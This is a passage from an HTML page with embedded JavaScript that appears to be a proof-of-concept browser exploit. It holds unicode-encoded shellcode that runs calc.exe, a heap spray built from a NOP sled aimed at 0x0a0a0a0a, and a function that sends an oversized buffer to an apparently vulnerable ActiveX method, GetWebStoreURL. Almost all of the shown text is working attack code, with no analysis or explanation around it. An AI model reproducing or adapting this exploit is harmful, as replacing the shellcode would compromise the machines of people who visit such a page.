"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sprayContainer = unescape("%u9090%u9090");
var heapToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 5000;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.GetWebStoreURL(x, 1);
}
function getsprayContainer(sprayContainer, sprayContainerSize)
{
while (sprayContainer.length*2<sprayContainerSize)
{
sprayContainer += sprayContainer;
}
sprayContainer = sprayContainer.substring(0,sprayContainerSize/2);
return (sprayContainer);
}
var heapBlockSize = 0x500000;
var SizeOfHeap = 0x30;
var payLoadSize = (heapspray.length * 2);
var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap);
var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sprayContainer + heapspray;
}
</SCRIPT>
</BODY>
</HTML>